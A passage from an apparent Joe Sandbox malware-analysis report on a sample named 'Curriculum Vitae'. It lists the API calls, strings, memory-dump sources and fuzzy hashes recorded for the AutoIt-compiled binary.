                      • Instruction Fuzzy Hash: 5CF05EF1641301BEF7206772AC4AFB73A5CEB05751F004465FF08E61A2D6768E8892F8
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _wcslen
                      • String ID: 3, 3, 16, 1
                      • API String ID: 176396367-3042988571
                      • Opcode ID: bbec46f7bc964da16a11308d6c65f3fbe507a0b92d5ef412f1aefde5d57906b8
                      • Instruction ID: 6c4dc9165e804025c3c2764ab6da31d2787ea46ab3393c8cd8382c23534be18c
                      • Opcode Fuzzy Hash: bbec46f7bc964da16a11308d6c65f3fbe507a0b92d5ef412f1aefde5d57906b8
                      • Instruction Fuzzy Hash: 8EE02B026042206592311279DCC29FF5689CFC5762714182FFD82C2266EA94CDD197B1
                      APIs
                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00D90B23
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Message
                      • String ID: AutoIt$Error allocating memory.
                      • API String ID: 2030045667-4017498283
                      • Opcode ID: 5b693fb01f8ab353cd463ff899bdc9d524d91621bf8b0cfc4f5bda9133efe6ac
                      • Instruction ID: 1e3f4aa65f817b017cdac5b8d9cb4b56b0f0447fbcebd1a5ca43d5809f6ce456
                      • Opcode Fuzzy Hash: 5b693fb01f8ab353cd463ff899bdc9d524d91621bf8b0cfc4f5bda9133efe6ac
                      • Instruction Fuzzy Hash: 07E0DF322843093BD21437947C03FC97A84CF05B26F14442AFB8C969D38AE264A00AB9
                      APIs
                        • Part of subcall function 00D4F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00D50D71,?,?,?,00D3100A), ref: 00D4F7CE
                      • IsDebuggerPresent.KERNEL32(?,?,?,00D3100A), ref: 00D50D75
                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00D3100A), ref: 00D50D84
                      Strings
                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00D50D7F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                      • API String ID: 55579361-631824599
                      • Opcode ID: e1556f17db15335a19f3a1c9074fb2ca2bfab382fb69745c6a02625d81c1f7d2
                      • Instruction ID: 809a027437f518638d103c7a8cffb7d63656709b8777b288a323c35f062b7be2
                      • Opcode Fuzzy Hash: e1556f17db15335a19f3a1c9074fb2ca2bfab382fb69745c6a02625d81c1f7d2
                      • Instruction Fuzzy Hash: 23E039702003428BD7209FA8D404B82BBE5EB00741F04892EE886C6B51DBB5E4488BB1
                      APIs
                      • __Init_thread_footer.LIBCMT ref: 00D4E3D5
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Init_thread_footer
                      • String ID: 0%$8%
                      • API String ID: 1385522511-2949748613
                      • Opcode ID: 64776c0a828a90f47da70132b3769d81a502b2fb3245cc537926101c96d00164
                      • Instruction ID: dff491b3c5334f7d5c45fde9ec5b3a512beb1b12677def9d5b7faa7a07f8e8e0
                      • Opcode Fuzzy Hash: 64776c0a828a90f47da70132b3769d81a502b2fb3245cc537926101c96d00164
                      • Instruction Fuzzy Hash: F4E02631400A10DFCA06AB19BC5DE8833D1FB49322F1091ACFB02A71D19B3228C5867F
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: LocalTime
                      • String ID: %.3d$X64
                      • API String ID: 481472006-1077770165
                      • Opcode ID: e59c114feaa63b4ecaaa04e8be6325412ae1a5f8c0229822eb24aa912762b151
                      • Instruction ID: c7514394507cde56f3a213856e0d9c0096c7ea4d6e9ac65a0cef08925e047c23
                      • Opcode Fuzzy Hash: e59c114feaa63b4ecaaa04e8be6325412ae1a5f8c0229822eb24aa912762b151
                      • Instruction Fuzzy Hash: 36D012A1808109FACB50A7D0DC49EB9B3BEEB09301F508452F956D20C0D634C5086775
                      APIs
                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DC236C
                      • PostMessageW.USER32(00000000), ref: 00DC2373
                        • Part of subcall function 00D9E97B: Sleep.KERNEL32 ref: 00D9E9F3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: FindMessagePostSleepWindow
                      • String ID: Shell_TrayWnd
                      • API String ID: 529655941-2988720461
                      • Opcode ID: 632a124013cb152336ed5990bf82caac338efb5659c373a885f97452eb279ef5
                      • Instruction ID: 671b01ebcb11f4704cb0cef16e4e0dd9091ebc03b6cd0f29dc7dd9ed67b5759a
                      • Opcode Fuzzy Hash: 632a124013cb152336ed5990bf82caac338efb5659c373a885f97452eb279ef5
                      • Instruction Fuzzy Hash: 95D0C9327E13127AE664B7719C0FFC666149B04B14F115916B74AEA2E0C9A4A8458A74
                      APIs
                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DC232C
                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00DC233F
                        • Part of subcall function 00D9E97B: Sleep.KERNEL32 ref: 00D9E9F3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: FindMessagePostSleepWindow
                      • String ID: Shell_TrayWnd
                      • API String ID: 529655941-2988720461
                      • Opcode ID: 6ed8bfc1ef47cdccd27c39b72a21ccfe28f4aa26b60e7a9f6aeb14b3a732aca2
                      • Instruction ID: abbaf728a4fea1efe8ca3f7c1fb06df032873f96260d110e9721b2bb287a9591
                      • Opcode Fuzzy Hash: 6ed8bfc1ef47cdccd27c39b72a21ccfe28f4aa26b60e7a9f6aeb14b3a732aca2
                      • Instruction Fuzzy Hash: 6ED0A9327A0312BAE664B3309C0FFC66A049B00B00F004906B30AEA2E0C8A0A8018A30